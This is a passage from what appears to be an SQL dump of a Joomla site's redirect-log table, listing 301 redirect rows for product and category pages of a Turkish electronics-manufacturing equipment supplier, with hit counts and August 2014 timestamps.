00:00:00',301),(2439,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',6,0,'2014-08-12 11:26:24','0000-00-00 00:00:00',301),(2440,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',10,0,'2014-08-12 11:33:06','0000-00-00 00:00:00',301),(2441,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',3,0,'2014-08-12 11:48:17','0000-00-00 00:00:00',301),(2442,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',8,0,'2014-08-12 12:10:10','0000-00-00 00:00:00',301),(2443,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',5,0,'2014-08-12 12:17:41','0000-00-00 00:00:00',301),(2444,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160','','','',1,0,'2014-08-12 12:19:35','0000-00-00 00:00:00',301),(2445,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-08-12 12:40:58','0000-00-00 00:00:00',301),(2446,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',1,0,'2014-08-12 12:41:01','0000-00-00 00:00:00',301),(2447,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',7,0,'2014-08-12 12:46:49','0000-00-00 00:00:00',301),(2448,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149','','','',3,0,'2014-08-12 12:53:09','0000-00-00 00:00:00',301),(2449,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',11,0,'2014-08-12 13:08:44','0000-00-00 00:00:00',301),(2450,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',9,0,'2014-08-12 13:15:57','0000-00-00 00:00:00',301),(2451,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',1,0,'2014-08-12 13:17:07','0000-00-00 00:00:00',301),(2452,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','https://www.google.com.tr/','',1,0,'2014-08-12 13:32:03','0000-00-00 00:00:00',301),(2453,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',1,0,'2014-08-12 13:47:52','0000-00-00 00:00:00',301),(2454,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',6,0,'2014-08-12 14:32:38','0000-00-00 00:00:00',301),(2455,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',3,0,'2014-08-12 14:35:54','0000-00-00 00:00:00',301),(2456,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',4,0,'2014-08-12 15:01:00','0000-00-00 00:00:00',301),(2457,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162','','','',1,0,'2014-08-12 15:19:41','0000-00-00 00:00:00',301),(2458,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',1,0,'2014-08-12 15:34:52','0000-00-00 00:00:00',301),(2459,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',1,0,'2014-08-12 15:48:22','0000-00-00 00:00:00',301),(2460,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',1,0,'2014-08-12 16:11:19','0000-00-00 00:00:00',301),(2461,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',2,0,'2014-08-12 16:14:15','0000-00-00 00:00:00',301),(2462,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',1,0,'2014-08-12 16:37:11','0000-00-00 00:00:00',301),(2463,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',1,0,'2014-08-12 16:53:06','0000-00-00 00:00:00',301),(2464,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',1,0,'2014-08-12 17:02:54','0000-00-00 00:00:00',301),(2465,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',1,0,'2014-08-12 17:14:06','0000-00-00 00:00:00',301),(2466,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',4,0,'2014-08-12 17:17:30','0000-00-00 00:00:00',301),(2467,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',7,0,'2014-08-12 17:24:51','0000-00-00 00:00:00',301),(2468,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',14,0,'2014-08-12 17:51:08','0000-00-00 00:00:00',301),(2469,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',1,0,'2014-08-12 17:59:28','0000-00-00 00:00:00',301),(2470,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',2,0,'2014-08-12 18:18:08','0000-00-00 00:00:00',301),(2471,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',1,0,'2014-08-12 18:19:54','0000-00-00 00:00:00',301),(2472,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',2,0,'2014-08-12 18:21:05','0000-00-00 00:00:00',301),(2473,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',1,0,'2014-08-12 18:24:45','0000-00-00 00:00:00',301),(2474,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-08-12 18:27:35','0000-00-00 00:00:00',301),(2475,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-08-12 18:32:51','0000-00-00 00:00:00',301),(2476,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',2,0,'2014-08-12 18:35:57','0000-00-00 00:00:00',301),(2477,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',1,0,'2014-08-12 18:38:04','0000-00-00 00:00:00',301),(2478,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',12,0,'2014-08-12 18:39:48','0000-00-00 00:00:00',301),(2479,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',5,0,'2014-08-12 18:50:36','0000-00-00 00:00:00',301),(2480,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',2,0,'2014-08-12 18:59:49','0000-00-00 00:00:00',301),(2481,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default','','','',3,0,'2014-08-12 19:03:02','0000-00-00 00:00:00',301),(2482,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-12 19:14:04','0000-00-00 00:00:00',301),(2483,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',2,0,'2014-08-12 19:17:02','0000-00-00 00:00:00',301),(2484,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',8,0,'2014-08-12 19:17:40','0000-00-00 00:00:00',301),(2485,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',2,0,'2014-08-12 19:25:27','0000-00-00 00:00:00',301),(2486,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',17,0,'2014-08-12 19:26:23','0000-00-00 00:00:00',301),(2487,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',11,0,'2014-08-12 19:33:43','0000-00-00 00:00:00',301),(2488,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',10,0,'2014-08-12 19:39:07','0000-00-00 00:00:00',301),(2489,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',2,0,'2014-08-12 19:40:20','0000-00-00 00:00:00',301),(2490,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',2,0,'2014-08-12 19:40:25','0000-00-00 00:00:00',301),(2491,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',12,0,'2014-08-12 19:58:06','0000-00-00 00:00:00',301),(2492,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',4,0,'2014-08-12 20:06:39','0000-00-00 00:00:00',301),(2493,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',1,0,'2014-08-12 20:07:01','0000-00-00 00:00:00',301),(2494,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',2,0,'2014-08-12 20:17:39','0000-00-00 00:00:00',301),(2495,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',2,0,'2014-08-12 20:17:59','0000-00-00 00:00:00',301),(2496,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',17,0,'2014-08-12 20:31:24','0000-00-00 00:00:00',301),(2497,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',1,0,'2014-08-12 20:45:01','0000-00-00 00:00:00',301),(2498,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-08-12 20:45:03','0000-00-00 00:00:00',301),(2499,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',2,0,'2014-08-12 20:45:23','0000-00-00 00:00:00',301),(2500,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',2,0,'2014-08-12 20:46:19','0000-00-00 00:00:00',301),(2501,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',1,0,'2014-08-12 20:47:01','0000-00-00 00:00:00',301),(2502,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138','','','',3,0,'2014-08-12 20:48:44','0000-00-00 00:00:00',301),(2503,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',3,0,'2014-08-12 20:53:07','0000-00-00 00:00:00',301),(2504,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',1,0,'2014-08-12 20:55:53','0000-00-00 00:00:00',301),(2505,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',2,0,'2014-08-12 21:00:45','0000-00-00 00:00:00',301),(2506,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',2,0,'2014-08-12 21:00:46','0000-00-00 00:00:00',301),(2507,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',1,0,'2014-08-12 21:14:33','0000-00-00 00:00:00',301),(2508,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',2,0,'2014-08-12 21:20:47','0000-00-00 00:00:00',301),(2509,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',2,0,'2014-08-12 21:22:48','0000-00-00 00:00:00',301),(2510,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',1,0,'2014-08-12 21:26:06','0000-00-00 00:00:00',301),(2511,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',29,0,'2014-08-12 21:30:12','0000-00-00 00:00:00',301),(2512,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',1,0,'2014-08-12 21:40:00','0000-00-00 00:00:00',301),(2513,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',2,0,'2014-08-12 21:44:15','0000-00-00 00:00:00',301),(2514,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',4,0,'2014-08-12 21:44:27','0000-00-00 00:00:00',301),(2515,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-12 21:45:46','0000-00-00 00:00:00',301),(2516,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',2,0,'2014-08-12 21:54:21','0000-00-00 00:00:00',301),(2517,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',1,0,'2014-08-12 21:55:39','0000-00-00 00:00:00',301),(2518,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',10,0,'2014-08-12 21:57:34','0000-00-00 00:00:00',301),(2519,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',8,0,'2014-08-12 22:05:52','0000-00-00 00:00:00',301),(2520,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',3,0,'2014-08-12 22:07:33','0000-00-00 00:00:00',301),(2521,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default','','','',5,0,'2014-08-12 22:09:17','0000-00-00 00:00:00',301),(2522,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',2,0,'2014-08-12 22:10:47','0000-00-00 00:00:00',301),(2523,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',10,0,'2014-08-12 22:13:28','0000-00-00 00:00:00',301),(2524,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',2,0,'2014-08-12 22:16:27','0000-00-00 00:00:00',301),(2525,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',12,0,'2014-08-12 22:17:07','0000-00-00 00:00:00',301),(2526,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',11,0,'2014-08-12 22:18:28','0000-00-00 00:00:00',301),(2527,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',16,0,'2014-08-12 22:20:26','0000-00-00 00:00:00',301),(2528,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',12,0,'2014-08-12 22:21:25','0000-00-00 00:00:00',301),(2529,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',3,0,'2014-08-12 22:27:52','0000-00-00 00:00:00',301),(2530,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',1,0,'2014-08-12 22:36:30','0000-00-00 00:00:00',301),(2531,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',22,0,'2014-08-12 22:44:55','0000-00-00 00:00:00',301),(2532,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',5,0,'2014-08-12 23:05:09','0000-00-00 00:00:00',301),(2533,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',1,0,'2014-08-12 23:08:13','0000-00-00 00:00:00',301),(2534,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',2,0,'2014-08-12 23:27:31','0000-00-00 00:00:00',301),(2535,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',7,0,'2014-08-12 23:32:32','0000-00-00 00:00:00',301),(2536,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',3,0,'2014-08-12 23:32:43','0000-00-00 00:00:00',301),(2537,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',5,0,'2014-08-12 23:52:00','0000-00-00 00:00:00',301),(2538,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',7,0,'2014-08-12 23:54:14','0000-00-00 00:00:00',301),(2539,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',2,0,'2014-08-12 23:54:36','0000-00-00 00:00:00',301),(2540,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',4,0,'2014-08-13 00:18:25','0000-00-00 00:00:00',301),(2541,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',2,0,'2014-08-13 00:20:06','0000-00-00 00:00:00',301),(2542,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',13,0,'2014-08-13 00:21:29','0000-00-00 00:00:00',301),(2543,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',24,0,'2014-08-13 00:22:49','0000-00-00 00:00:00',301),(2544,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',1,0,'2014-08-13 00:25:34','0000-00-00 00:00:00',301),(2545,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',14,0,'2014-08-13 00:25:56','0000-00-00 00:00:00',301),(2546,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',111,0,'2014-08-13 00:28:29','0000-00-00 00:00:00',301),(2547,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',6,0,'2014-08-13 00:30:55','0000-00-00 00:00:00',301),(2548,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',6,0,'2014-08-13 00:33:21','0000-00-00 00:00:00',301),(2549,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-08-13 00:33:51','0000-00-00 00:00:00',301),(2550,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',3,0,'2014-08-13 00:43:05','0000-00-00 00:00:00',301),(2551,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',2,0,'2014-08-13 00:43:25','0000-00-00 00:00:00',301),(2552,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',10,0,'2014-08-13 00:47:11','0000-00-00 00:00:00',301),(2553,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',4,0,'2014-08-13 01:14:42','0000-00-00 00:00:00',301),(2554,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-13 01:24:18','0000-00-00 00:00:00',301),(2555,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-13 01:24:24','0000-00-00 00:00:00',301),(2556,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',2,0,'2014-08-13 01:25:14','0000-00-00 00:00:00',301),(2557,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',3,0,'2014-08-13 01:31:28','0000-00-00 00:00:00',301),(2558,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81','','','',1,0,'2014-08-13 01:37:04','0000-00-00 00:00:00',301),(2559,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',31,0,'2014-08-13 01:39:51','0000-00-00 00:00:00',301),(2560,'http://www.3s-technologies.com.tr/index.php/en/welcome.html','','','',60,0,'2014-08-13 01:40:24','0000-00-00 00:00:00',301),(2561,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',7,0,'2014-08-13 01:40:56','0000-00-00 00:00:00',301),(2562,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',2,0,'2014-08-13 01:55:26','0000-00-00 00:00:00',301),(2563,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default','','','',4,0,'2014-08-13 01:56:39','0000-00-00 00:00:00',301),(2564,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',7,0,'2014-08-13 02:06:56','0000-00-00 00:00:00',301),(2565,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',2,0,'2014-08-13 02:09:42','0000-00-00 00:00:00',301),(2566,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/component/content/category/80-turkish-tr/turkish-content','','','',17,0,'2014-08-13 02:11:42','0000-00-00 00:00:00',301),(2567,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',5,0,'2014-08-13 02:22:05','0000-00-00 00:00:00',301),(2568,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',7,0,'2014-08-13 02:25:04','0000-00-00 00:00:00',301),(2569,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',1,0,'2014-08-13 02:26:10','0000-00-00 00:00:00',301),(2570,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',2,0,'2014-08-13 02:26:52','0000-00-00 00:00:00',301),(2571,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',3,0,'2014-08-13 02:31:49','0000-00-00 00:00:00',301),(2572,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154','','','',10,0,'2014-08-13 02:40:37','0000-00-00 00:00:00',301),(2573,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',1,0,'2014-08-13 02:40:48','0000-00-00 00:00:00',301),(2574,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',18,0,'2014-08-13 02:41:08','0000-00-00 00:00:00',301),(2575,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',28,0,'2014-08-13 02:41:49','0000-00-00 00:00:00',301),(2576,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',1,0,'2014-08-13 02:43:13','0000-00-00 00:00:00',301),(2577,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',1,0,'2014-08-13 02:50:40','0000-00-00 00:00:00',301),(2578,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',8,0,'2014-08-13 02:58:51','0000-00-00 00:00:00',301),(2579,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',8,0,'2014-08-13 03:00:33','0000-00-00 00:00:00',301),(2580,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',2,0,'2014-08-13 03:00:55','0000-00-00 